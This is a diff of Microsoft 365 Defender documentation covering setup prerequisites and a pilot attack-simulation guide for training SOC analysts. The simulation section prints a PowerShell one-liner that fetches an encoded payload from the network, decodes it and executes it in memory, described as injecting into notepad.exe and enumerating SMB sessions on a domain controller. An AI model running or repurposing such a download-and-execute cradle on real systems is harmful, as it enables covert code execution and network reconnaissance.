+|Subscription requirements |One of the subscriptions: <ul><li>Microsoft 365 E5</li><li>Microsoft 365 A5</li><li>Microsoft 365 E5 Security</li><li>Microsoft 365 A5 Security</li><li>Office 365 E5 plus Enterprise Mobility + Security E5 plus Windows E5</li></ul><p> See [Microsoft 365 Defender licensing requirements](https://docs.microsoft.com/microsoft-365/security/mtp/prerequisites?#licensing-requirements).|
+|Network requirements |<ul><li>[Microsoft Defender for Identity](https://docs.microsoft.com/azure-advanced-threat-protection/what-is-atp) enabled</li><li>[Microsoft Cloud App Security](https://docs.microsoft.com/cloud-app-security/what-is-cloud-app-security) configured</li><li>[Microsoft Defender for Identity integration](https://docs.microsoft.com/cloud-app-security/mdi-integration)</li></ul>|
+|Windows machine requirements |Windows 10, version 1709 or later installed (See [Windows 10 release information](https://docs.microsoft.com/windows/release-information/)) with the following threat protection services configured:<ul><li>[Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints)</li><li>[Microsoft Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features)</li></ul>|
|Protection for email content and Office files |[Microsoft Defender for Office 365](https://docs.microsoft.com/microsoft-365/security/office-365-security/office-365-atp#configure-atp-policies) configured |
-|Permissions |- To configure automated investigation and response capabilities, you must have the Global Administrator or Security Administrator role assigned in either Azure Active Directory ([https://portal.azure.com](https://portal.azure.com)) or in the Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com)).<br/><br/>- To get the permissions needed to work with automated investigation and response capabilities, such as reviewing, approving, or rejecting pending actions, see [Required permissions for Action center tasks](mtp-action-center.md#required-permissions-for-action-center-tasks). |
+|Permissions |<ul><li>To configure automated investigation and response capabilities, you must have the Global Administrator or Security Administrator role assigned in either Azure Active Directory ([https://portal.azure.com](https://portal.azure.com)) or in the Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com)).</li><p><li>To get the permissions needed to work with automated investigation and response capabilities, such as reviewing, approving, or rejecting pending actions, see [Required permissions for Action center tasks](mtp-action-center.md#required-permissions-for-action-center-tasks).</li></ul>|
## Review or change the automation level for device groups
@@ -50,12 +49,12 @@ Whether automated investigations run, and whether remediation actions are taken
1. Go to the Microsoft Defender Security Center ([https://securitycenter.windows.com](https://securitycenter.windows.com)) and sign in.
-2. Go to **Settings** > **Permissions** > **Device groups**.
+2. Go to **Settings** > **Permissions** > **Device groups**.
3. Review your device group policies. In particular, look at the **Remediation level** column. We recommend using **Full - remediate threats automatically**. You might need to create or edit your device groups to get the level of automation you want. To get help with this task, see the following articles: - [How threats are remediated](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/automated-investigations#how-threats-are-remediated)
- - [Create and manage device groups](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/machine-groups)
+ - [Create and manage device groups](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/machine-groups)
## Review your security and alert policies in Office 365
@@ -73,14 +72,14 @@ Security settings in Office 365 help protect email and content. To view or chang
- [Anti-phishing in Defender for Office 365)](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#part-2---anti-phishing-protection) - [Safe Attachments (Office 365)](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#atp-safe-attachments-policies) - [Safe Links (Office 365)](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#atp-safe-links-policies)
- - [Anti-spam (Office 365)](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#part-3---anti-spam-protection)
+ - [Anti-spam (Office 365)](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#part-3---anti-spam-protection)
+
+3. Make sure [Microsoft Defender for Office 365 for SharePoint, OneDrive, and Microsoft Teams](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#part-5---turn-on-atp-for-sharepoint-onedrive-and-microsoft-teams-workloads) is turned on.
-4. Make sure [Microsoft Defender for Office 365 for SharePoint, OneDrive, and Microsoft Teams](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#part-5---turn-on-atp-for-sharepoint-onedrive-and-microsoft-teams-workloads) is turned on.
+4. Make sure [zero-hour auto purge for email](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#zero-hour-auto-purge-for-email-in-eop) protection is in effect.
-5. Make sure [zero-hour auto purge for email](https://docs.microsoft.com/microsoft-365/security/office-365-security/protect-against-threats#zero-hour-auto-purge-for-email-in-eop) protection is in effect.
+5. (This is optional.) Review your [Office 365 alert policies](https://docs.microsoft.com/microsoft-365/compliance/alert-policies) in the Microsoft 365 compliance center ([https://compliance.microsoft.com/compliancepolicies](https://compliance.microsoft.com/compliancepolicies)). Several default alert policies are in the Threat management category. Some of these alerts can trigger automated investigation and response. To learn more, see [Default alert policies](https://docs.microsoft.com/microsoft-365/compliance/alert-policies?#default-alert-policies).
-8. (This is optional.) Review your [Office 365 alert policies](https://docs.microsoft.com/microsoft-365/compliance/alert-policies) in the Microsoft 365 compliance center ([https://compliance.microsoft.com/compliancepolicies](https://compliance.microsoft.com/compliancepolicies)). Several default alert policies are in the Threat management category. Some of these alerts can trigger automated investigation and response. To learn more, see [Default alert policies](https://docs.microsoft.com/microsoft-365/compliance/alert-policies?#default-alert-policies).
-
## Make sure Microsoft 365 Defender is turned on 1. Go to the Microsoft 365 security center ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
@@ -93,12 +92,12 @@ Security settings in Office 365 help protect email and content. To view or chang
- If you do *not* see **Incidents**, **Action center**, or **Hunting**, then Microsoft 365 Defender might not be turned on. In this case, proceed to the next step ([Review pending and completed actions](#review-pending-and-completed-actions-in-the-action-center), in this article).
-3. In the navigation pane, choose **Settings** > **Microsoft 365 Defender**. Confirm that Microsoft 365 Defender is turned on.
+3. In the navigation pane, choose **Settings** > **Microsoft 365 Defender**. Confirm that Microsoft 365 Defender is turned on.
Need help? See [Turn on Microsoft 365 Defender](https://docs.microsoft.com/microsoft-365/security/mtp/mtp-enable). ## Review pending and completed actions in the Action center
-After you have configured automated investigation and response in Microsoft 365 Defender, your next step is to visit the Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)). There, you can review and approve pending actions, and see remediation actions that were taken automatically or manually.
+After you have configured automated investigation and response in Microsoft 365 Defender, your next step is to visit the Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)). There, you can review and approve pending actions, and see remediation actions that were taken automatically or manually.
[Visit the Action center](mtp-action-center.md).
security https://docs.microsoft.com/en-us/microsoft-365/security/mtp/mtp-enable https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/mtp/mtp-enable.md
@@ -14,7 +14,7 @@ author: lomayor
ms.localizationpriority: medium manager: dansimp audience: ITPro
-ms.collection: M365-security-compliance
+ms.collection: M365-security-compliance
ms.topic: conceptual search.appverid: - MOE150
@@ -34,39 +34,46 @@ search.appverid:
Microsoft 365 Defender automatically turns on when eligible customers with the required permissions visit Microsoft 365 security center. Read this article to understand various prerequisites and how Microsoft 365 Defender is provisioned. ## Check license eligibility and required permissions+ A license to a Microsoft 365 security product generally entitles you to use Microsoft 365 Defender in Microsoft 365 security center without additional licensing cost. We do recommend getting a Microsoft 365 E5, E5 Security, A5, or A5 Security license or a valid combination of licenses that provides access to all supported services. For detailed licensing information, [read the licensing requirements](prerequisites.md#licensing-requirements). ### Check your role
-You must be a **global administrator** or a **security administrator** in Azure Active Directory to turn on Microsoft 365 Defender. [View your roles in Azure AD](https://docs.microsoft.com//azure/active-directory/users-groups-roles/directory-manage-roles-portal)
+
+You must be a **global administrator** or a **security administrator** in Azure Active Directory to turn on Microsoft 365 Defender. [View your roles in Azure AD](https://docs.microsoft.com/azure/active-directory/users-groups-roles/directory-manage-roles-portal)
## Supported services+ Microsoft 365 Defender aggregates data from the various supported services that you've already deployed. It will process and store data centrally to identify new insights and make centralized response workflows possible. It does this without affecting existing deployments, settings, or data associated with the integrated services. To get the best protection and optimize Microsoft 365 Defender, we recommend deploying all applicable supported services on your network. For more information, [read about deploying supported services](deploy-supported-services.md). ## Before starting the service+ Before you turn on the service, the Microsoft 365 security center ([security.microsoft.com](https://security.microsoft.com)) shows the Microsoft 365 Defender settings page when you select **Incidents**, **Action center**, or **Hunting** from the navigation pane. These navigation items are not shown if you are not eligible to use Microsoft 365 Defender. ![Image of the Microsoft 365 Defender settings page shown if Microsoft 365 Defender has not been turned on](../../media/mtp-enable/mtp-settings.png) *Microsoft 365 Defender settings in Microsoft 365 security center* ## Starting the service+ To turn on Microsoft 365 Defender, simply select **Turn on Microsoft 365 Defender** and apply the change. You can also access this option by selecting **Settings** ([security.microsoft.com/settings](https://security.microsoft.com/settings)) in the navigation pane and then selecting **Microsoft 365 Defender**.
->[!NOTE]
->If you don't see **Settings** in the navigation pane or couldn't access the page, check your permissions and licenses.
+> [!NOTE]
+> If you don't see **Settings** in the navigation pane or couldn't access the page, check your permissions and licenses.
### Data center location
-Microsoft 365 Defender will store and process data in the [same location used by Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/data-storage-privacy). If you don't have Microsoft Defender for Endpoint, a new data center location is automatically selected based on the location of active Microsoft 365 security services. The selected data center location is shown in the screen.
-Select **Need help?** in the Microsoft 365 security center to contact Microsoft support about provisioning Microsoft 365 Defender in a different data center location.
+Microsoft 365 Defender will store and process data in the [same location used by Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/data-storage-privacy). If you don't have Microsoft Defender for Endpoint, a new data center location is automatically selected based on the location of active Microsoft 365 security services. The selected data center location is shown in the screen.
+
+Select **Need help?** in the Microsoft 365 security center to contact Microsoft support about provisioning Microsoft 365 Defender in a different data center location.
->[!NOTE]
->Microsoft Defender for Endpoint automatically provisions in European Union (EU) data centers when turned on through Azure Defender. Microsoft 365 Defender will automatically provision in the same EU data center for customers who have provisioned Defender for Endpoint in this manner.
+> [!NOTE]
+> Microsoft Defender for Endpoint automatically provisions in European Union (EU) data centers when turned on through Azure Defender. Microsoft 365 Defender will automatically provision in the same EU data center for customers who have provisioned Defender for Endpoint in this manner.
### Confirm that the service is on+ Once the service is provisioned, it adds: - [Incidents management](incidents-overview.md)
@@ -77,8 +84,8 @@ Once the service is provisioned, it adds:
*Microsoft 365 security center with incidents management and other Microsoft 365 Defender capabilities* ### Getting Microsoft Defender for Identity data
-To share Microsoft Defender for Identity data with Microsoft 365 Defender, ensure that Microsoft Cloud App Security and Microsoft Defender for Identity integration is turned on. [Learn more about this integration](https://docs.microsoft.com/cloud-app-security/aatp-integration)
+To share Microsoft Defender for Identity data with Microsoft 365 Defender, ensure that Microsoft Cloud App Security and Microsoft Defender for Identity integration is turned on. [Learn more about this integration](https://docs.microsoft.com/cloud-app-security/mdi-integration).
## Get assistance
security https://docs.microsoft.com/en-us/microsoft-365/security/mtp/mtp-pilot-simulate https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/mtp/mtp-pilot-simulate.md
@@ -1,5 +1,5 @@
---
-title: Run your Microsoft 365 Defender attack simulations
+title: Run your Microsoft 365 Defender attack simulations
description: Run attack simulations for your Microsoft 365 Defender pilot project to see how it unfolds and is quickly remediated. keywords: Microsoft Threat Protection pilot attack simulation, run Microsoft Threat Protection pilot attack simulation, simulate attack in Microsoft Threat Protection, Microsoft Threat Protection pilot project, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting search.product: eADQiWindows 10XVcnh
@@ -22,80 +22,78 @@ ms.collection:
ms.topic: conceptual ---
-# Run your Microsoft 365 Defender attack simulations
+# Run your Microsoft 365 Defender attack simulations
[!INCLUDE [Microsoft 365 Defender rebranding](../includes/microsoft-defender.md)]
-|[![Planning](../../media/phase-diagrams/1-planning.png)](mtp-pilot-plan.md)<br/>[Planning](mtp-pilot-plan.md) |[![Prepare](../../media/phase-diagrams/2-prepare.png)](prepare-mtpeval.md)<br/>[Preparation](prepare-mtpeval.md) | ![Simulate attack](../../media/phase-diagrams/3-simluate.png)<br/>Simulate attack| [![Close and summarize](../../media/phase-diagrams/4-summary.png)](mtp-pilot-close.md)<br/>[Close and summarize](mtp-pilot-close.md)|
+|[![Planning](../../media/phase-diagrams/1-planning.png)](mtp-pilot-plan.md)<br/>[Planning](mtp-pilot-plan.md)|[![Prepare](../../media/phase-diagrams/2-prepare.png)](prepare-mtpeval.md)<br/>[Preparation](prepare-mtpeval.md)|![Simulate attack](../../media/phase-diagrams/3-simluate.png)<br/>Simulate attack|[![Close and summarize](../../media/phase-diagrams/4-summary.png)](mtp-pilot-close.md)<br/>[Close and summarize](mtp-pilot-close.md)|
|--|--|--|--|
-|| |*You are here!* | |
+|||*You are here!*||
You're currently in the attack simulation phase.
-After preparing your pilot environment, itΓÇÖs time to test the Microsoft 365 Defender incident management and automated investigation and remediation capabilities. We'll help you to simulate a sophisticated attack that leverages advanced techniques to hide from detection. The attack enumerates opened Server Message Block (SMB) sessions on domain controllers and retrieves recent IP addresses of usersΓÇÖ devices. This category of attacks usually doesnΓÇÖt include files dropped on the victimΓÇÖs deviceΓÇöthey occur solely in memory. They ΓÇ£live off the landΓÇ¥ by using existing system and administrative tools and inject their code into system processes to hide their execution, Such behavior allows them to evade detection and persist on the device.
+After preparing your pilot environment, it's time to test the Microsoft 365 Defender incident management and automated investigation and remediation capabilities. We'll help you to simulate a sophisticated attack that leverages advanced techniques to hide from detection. The attack enumerates opened Server Message Block (SMB) sessions on domain controllers and retrieves recent IP addresses of users' devices. This category of attacks usually doesn't include files dropped on the victim's deviceΓÇöthey occur solely in memory. They "live off the land" by using existing system and administrative tools and inject their code into system processes to hide their execution, Such behavior allows them to evade detection and persist on the device.
In this simulation, our sample scenario starts with a PowerShell script. A user might be tricked into running a script. Or the script might run from a remote connection to another computer from a previously infected deviceΓÇöthe attacker attempting to move laterally in the network. Detection of these scripts can be difficult because administrators also often run scripts remotely to carry out various administrative activities. ![Fileless PowerShell attack with process injection and SMB reconnaisance attack diagram](../../media/mtp/mtpdiydiagram.png)
-During the simulation, the attack injects shellcode into a seemingly innocent process. The scenario requires the use of notepad.exe. We chose this process for the simulation, but attackers would more likely target a long-running system process, such as svchost.exe. The shellcode then goes on to contact the attackerΓÇÖs command-and-control (C2) server to receive instructions on how to proceed. The script attempts executing reconnaissance queries against the domain controller (DC). Reconnaissance allows an attacker to get information about recent user login information. Once attackers have this information, they can move laterally in the network to get to a specific sensitive account
-
->[!IMPORTANT]
->For optimum results, follow the attack simulation instructions as closely as possible.
+During the simulation, the attack injects shellcode into a seemingly innocent process. The scenario requires the use of notepad.exe. We chose this process for the simulation, but attackers would more likely target a long-running system process, such as svchost.exe. The shellcode then goes on to contact the attacker's command-and-control (C2) server to receive instructions on how to proceed. The script attempts executing reconnaissance queries against the domain controller (DC). Reconnaissance allows an attacker to get information about recent user login information. Once attackers have this information, they can move laterally in the network to get to a specific sensitive account
+> [!IMPORTANT]
+> For optimum results, follow the attack simulation instructions as closely as possible.
## Simulation environment requirements Since you have already configured your pilot environment during the preparation phase, ensure that you have two devices for this scenario: a test device and a domain controller.
-1. Verify your tenant has [enabled Microsoft 365 Defender](https://docs.microsoft.com/microsoft-365/security/mtp/mtp-enable#starting-the-service).
+1. Verify your tenant has [enabled Microsoft 365 Defender](https://docs.microsoft.com/microsoft-365/security/mtp/mtp-enable#starting-the-service).
-2. Verify your test domain controller configuration:
+2. Verify your test domain controller configuration:
- - Device runs with Windows Server 2008 R2 or a later version.
- - The test domain controller to [Microsoft Defender for Identity](https://docs.microsoft.com/azure/security-center/security-center-wdatp) and enable [remote management](https://docs.microsoft.com/windows-server/administration/server-manager/configure-remote-management-in-server-manager).
- - Verify that [Microsoft Defender for Identity and Microsoft Cloud App Security integration](https://docs.microsoft.com/cloud-app-security/aatp-integration) have been enabled.
- - A test user is created on your domain ΓÇô no admin permissions needed.
+ - Device runs with Windows Server 2008 R2 or a later version.
+ - The test domain controller to [Microsoft Defender for Identity](https://docs.microsoft.com/azure/security-center/security-center-wdatp) and enable [remote management](https://docs.microsoft.com/windows-server/administration/server-manager/configure-remote-management-in-server-manager).
+ - Verify that [Microsoft Defender for Identity and Microsoft Cloud App Security integration](https://docs.microsoft.com/cloud-app-security/mdi-integration) have been enabled.
+ - A test user is created on your domain ΓÇô no admin permissions needed.
-3. Verify test device configuration:
-
- 1. Device runs with Windows 10 version 1903 or a later version.
-
- 1. Test device is joined to the test domain.
-
- 1. [Turn on Windows Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see this [troubleshooting topic](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
-
- 1. Verify that the test device is [onboarded to Microsoft Defender for Endpoint)](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
+3. Verify test device configuration:
-If you use an existing tenant and implement device groups, create a dedicated device group for the test device and push it to top level in configuration UX.
+ 1. Device runs with Windows 10 version 1903 or a later version.
+
+ 1. Test device is joined to the test domain.
+ 1. [Turn on Windows Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see this [troubleshooting topic](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
+
+ 1. Verify that the test device is [onboarded to Microsoft Defender for Endpoint)](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
+
+If you use an existing tenant and implement device groups, create a dedicated device group for the test device and push it to top level in configuration UX.
-## Run the simulation
+## Run the attack scenario simulation
To run the attack scenario simulation:
-1. Log in to the test device with the test user account.
+1. Log in to the test device with the test user account.
-2. Open a Windows PowerShell window on the test device.
+2. Open a Windows PowerShell window on the test device.
-3. Copy the following simulation script:
+3. Copy the following simulation script:
- ```powershell
- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
- = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
- -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
- $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
- $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
- ```
-
- > [!NOTE]
- > If you open this document on a web browser, you might encounter problems copying the full text without losing certain characters or introducing extra line breaks. Download this document and open it on Adobe Reader.
+ ```powershell
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
+ = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
+ -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
+ $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
+ $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
+ ```
+
+ > [!NOTE]
+ > If you open this document on a web browser, you might encounter problems copying the full text without losing certain characters or introducing extra line breaks. Download this document and open it on Adobe Reader.
4. At the prompt, paste and run the copied script.
->[!NOTE]
->If you're running PowerShell using remote desktop protocol (RDP), use the Type Clipboard Text command in the RDP client because the **CTRL-V** hotkey or right-click-paste method might not work. Recent versions of PowerShell sometimes will also not accept that method, you might have to copy to Notepad in memory first, copy it in the virtual machine, and then paste it into PowerShell.
+> [!NOTE]
+> If you're running PowerShell using remote desktop protocol (RDP), use the Type Clipboard Text command in the RDP client because the **CTRL-V** hotkey or right-click-paste method might not work. Recent versions of PowerShell sometimes will also not accept that method, you might have to copy to Notepad in memory first, copy it in the virtual machine, and then paste it into PowerShell.
A few seconds later, <i>notepad.exe</i> will open. A simulated attack code will be injected into notepad.exe. Keep the automatically generated Notepad instance open to experience the full scenario.
@@ -104,31 +102,29 @@ The simulated attack code will attempt to communicate to an external IP address
You'll see a message displayed on the PowerShell console when this script completes. ```console
-ran NetSessionEnum against [DC Name] with return code result 0
+ran NetSessionEnum against [DC Name] with return code result 0
``` To see the Automated Incident and Response feature in action, keep the notepad.exe process open. You'll see Automated Incident and Response stop the Notepad process. - ## Investigate an incident
->[!NOTE]
->Before we walk you through this simulation, watch the following video to see how incident management helps you piece the related alerts together as part of the investigation process, where you can find it in the portal, and how it can help you in your security operations:
+> [!NOTE]
+> Before we walk you through this simulation, watch the following video to see how incident management helps you piece the related alerts together as part of the investigation process, where you can find it in the portal, and how it can help you in your security operations:
->[!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bzwz?]
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bzwz?]
-Switching to the SOC analyst point of view, you can now start to investigate the attack in the Microsoft 365 Security Center portal.
+Switching to the SOC analyst point of view, you can now start to investigate the attack in the Microsoft 365 Security Center portal.
-1. Open the [Microsoft 365 Security Center portal](https://security.microsoft.com/incidents) incident queue from any device.
+1. Open the [Microsoft 365 Security Center portal](https://security.microsoft.com/incidents) incident queue from any device.
-2. Navigate to **Incidents** from the menu.
+2. Navigate to **Incidents** from the menu.
- ![Screenshot of incidents as shown on the Microsoft 365 Security CenterΓÇÖs left-hand side menu](../../media/mtp/fig1.png)
+ ![Screenshot of incidents as shown on the Microsoft 365 Security Center's left-hand side menu](../../media/mtp/fig1.png)
-3. The new incident for the simulated attack will appear in the incident queue.
-
- ![Screenshot of the incident queue](../../media/mtp/fig2.png)
+3. The new incident for the simulated attack will appear in the incident queue.
+ ![Screenshot of the incident queue](../../media/mtp/fig2.png)
### Investigate the attack as a single incident
@@ -138,47 +134,44 @@ The alerts generated during this simulation are associated with the same threat,
To view the incident:
-1. Navigate to the **Incidents** queue.
-
- ![Screenshot of incidents from the navigation menu](../../media/mtp/fig1.png)
+1. Navigate to the **Incidents** queue.
-2. Select the newest item by clicking on the circle located left of the incident name. A side panel displays additional information about the incident, including all the related alerts. Each incident has a unique name that describes it based on the attributes of the alerts it includes.
+ ![Screenshot of incidents from the navigation menu](../../media/mtp/fig1.png)
- ![Screenshot of the incidents page where generated alerts are aggregated during the simulation](../../media/mtp/fig4.png)
+2. Select the newest item by clicking on the circle located left of the incident name. A side panel displays additional information about the incident, including all the related alerts. Each incident has a unique name that describes it based on the attributes of the alerts it includes.
- The alerts that show in the dashboard can be filtered based on service resources: Microsoft Defender for Identity, Microsoft Cloud App Security, Microsoft Defender for Endpoint, Microsoft 365 Defender, and Microsoft Defender for Office 365.
+ ![Screenshot of the incidents page where generated alerts are aggregated during the simulation](../../media/mtp/fig4.png)
-3. Select **Open incident page** to get more information about the incident.
+ The alerts that show in the dashboard can be filtered based on service resources: Microsoft Defender for Identity, Microsoft Cloud App Security, Microsoft Defender for Endpoint, Microsoft 365 Defender, and Microsoft Defender for Office 365.
- In the **Incident** page, you can see all the alerts and information related to the incident. The information includes the entities and assets that are involved in the alert, the detection source of the alerts (Microsoft Defender for Identity, EDR), and the reason they were linked together. Reviewing the incident alert list shows the progression of the attack. From this view, you can see and investigate the individual alerts.
+3. Select **Open incident page** to get more information about the incident.
- You can also click **Manage incident** from the right-hand menu, to tag the incident, assign it to yourself, and add comments.
+ In the **Incident** page, you can see all the alerts and information related to the incident. The information includes the entities and assets that are involved in the alert, the detection source of the alerts (Microsoft Defender for Identity, EDR), and the reason they were linked together. Reviewing the incident alert list shows the progression of the attack. From this view, you can see and investigate the individual alerts.
- ![Screenshot of where to click Manage incident](../../media/mtp/fig5a.png)
+ You can also click **Manage incident** from the right-hand menu, to tag the incident, assign it to yourself, and add comments.
- ![Screenshot of the fields on the manage incident panel where you can tag the incident, assign it to yourself, and add comments ](../../media/mtp/fig5b.png)
+ ![Screenshot of where to click Manage incident](../../media/mtp/fig5a.png)
+ ![Screenshot of the fields on the manage incident panel where you can tag the incident, assign it to yourself, and add comments ](../../media/mtp/fig5b.png)
-### Review generated alerts
+### Review generated alerts
-LetΓÇÖs look at some of the alerts generated during the simulated attack.
+Let's look at some of the alerts generated during the simulated attack.
->[!NOTE]
->WeΓÇÖll walk through only a few of the alerts generated during the simulated attack. Depending on the version of Windows and the Microsoft 365 Defender products running on your test device, you might see more alerts that appear in a slightly different order.
+> [!NOTE]
+> We'll walk through only a few of the alerts generated during the simulated attack. Depending on the version of Windows and the Microsoft 365 Defender products running on your test device, you might see more alerts that appear in a slightly different order.
-![Screenshot of generated alerts](../../media/mtp/fig6.png)
+![Screenshot of generated alerts](../../media/mtp/fig6.png)
-
-**Alert: Suspicious process injection observed (Source: Microsoft Defender for Endpoint EDR)**
+#### Alert: Suspicious process injection observed (Source: Microsoft Defender for Endpoint EDR)
Advanced attackers use sophisticated and stealthy methods to persist in memory and hide from detection tools. One common technique is to operate from within a trusted system process rather than a malicious executable, making it hard for detection tools and security operations to spot the malicious code. To allow the SOC analysts to catch these advanced attacks, deep memory sensors in Microsoft Defender for Endpoint provide our cloud service with unprecedented visibility into a variety of cross-process code injection techniques. The following figure shows how Defender for Endpoint detected and alerted on the attempt to inject code to <i>notepad.exe</i>.
-![Screenshot of the alert for injection of potentially malicious code](../../media/mtp/fig7.png)
-
+![Screenshot of the alert for injection of potentially malicious code](../../media/mtp/fig7.png)
-**Alert: Unexpected behavior observed by a process run with no command-line arguments (Source: Microsoft Defender for Endpoint EDR)**
+#### Alert: Unexpected behavior observed by a process run with no command-line arguments (Source: Microsoft Defender for Endpoint EDR)
Microsoft Defender for Endpoint detections often target the most common attribute of an attack technique. This method ensures durability and raises the bar for attackers to switch to newer tactics.
@@ -186,36 +179,35 @@ We employ large-scale learning algorithms to establish the normal behavior of co
For this scenario, the process <i>notepad.exe</i> is exhibiting abnormal behavior, involving communication with an external location. This outcome is independent of the specific method used to introduce and execute the malicious code.
->[!NOTE]
->Because this alert is based on machine-learning models that require additional backend processing, it might take some time before you see this alert in the portal.
+> [!NOTE]
+> Because this alert is based on machine-learning models that require additional backend processing, it might take some time before you see this alert in the portal.
Notice that the alert details include the external IP addressΓÇöan indicator that you can use as a pivot to expand investigation. Select the IP address in the alert process tree to view the IP address details page.
-![Screenshot of the alert for unexpected behavior by a process run with no command line arguments](../../media/mtp/fig8.png)
+![Screenshot of the alert for unexpected behavior by a process run with no command line arguments](../../media/mtp/fig8.png)
The following figure displays the selected IP Address details page (clicking on IP address in the Alert process tree). ![Screenshot of the IP address details page](../../media/mtp/fig9.png) -
-**Alert: User and IP address reconnaissance (SMB) (Source: Microsoft Defender for Identity)**
+#### Alert: User and IP address reconnaissance (SMB) (Source: Microsoft Defender for Identity)
Enumeration using Server Message Block (SMB) protocol enables attackers to get recent user logon information that helps them move laterally through the network to access a specific sensitive account. In this detection, an alert is triggered when the SMB session enumeration runs against a domain controller.
-![Screenshot of the Microsoft Defender for Identity alert for User and IP address reconnaissance](../../media/mtp/fig10.png)
-
+![Screenshot of the Microsoft Defender for Identity alert for User and IP address reconnaissance](../../media/mtp/fig10.png)
### Review the device timeline [Microsoft Defender for Endpoint]+ After exploring the various alerts in this incident, navigate back to the incident page you investigated earlier. Select the **Devices** tab in the incident page to review the devices involved in this incident as reported by Microsoft Defender for Endpoint and Microsoft Defender for Identity. Select the name of the device where the attack was conducted, to open the entity page for that specific device. In that page, you can see alerts that were triggered and related events. Select the **Timeline** tab to open the device timeline and view all events and behaviors observed on the device in chronological order, interspersed with the alerts raised.
-![Screenshot of the device timeline with behaviors](../../media/mtp/fig11.png)
+![Screenshot of the device timeline with behaviors](../../media/mtp/fig11.png)
Expanding some of the more interesting behaviors provides useful details, such as process trees.
@@ -225,35 +217,36 @@ For example, scroll down until you find the alert event **Suspicious process inj
### Review the user information [Microsoft Cloud App Security]
-On the incident page, select the **Users** tab to display the list of users involved in the attack. The table contains additional information about each user, including each userΓÇÖs **Investigation Priority** score.
+On the incident page, select the **Users** tab to display the list of users involved in the attack. The table contains additional information about each user, including each user's **Investigation Priority** score.
-Select the user name to open the userΓÇÖs profile page where further investigation can be conducted. [Read more about investigating risky users](https://docs.microsoft.com/cloud-app-security/tutorial-ueba#identify).
-<br>
-![Screenshot of Cloud App Security user page](../../media/mtp/fig13.png)
+Select the user name to open the user's profile page where further investigation can be conducted. [Read more about investigating risky users](https://docs.microsoft.com/cloud-app-security/tutorial-ueba#identify).
+![Screenshot of Cloud App Security user page](../../media/mtp/fig13.png)
## Automated investigation and remediation
->[!NOTE]
+
+> [!NOTE]
>Before we walk you through this simulation, watch the following video to get familiar with what automated self-healing is, where to find it in the portal, and how it can help in your security operations:
->[!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4BzwB]
+> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4BzwB]
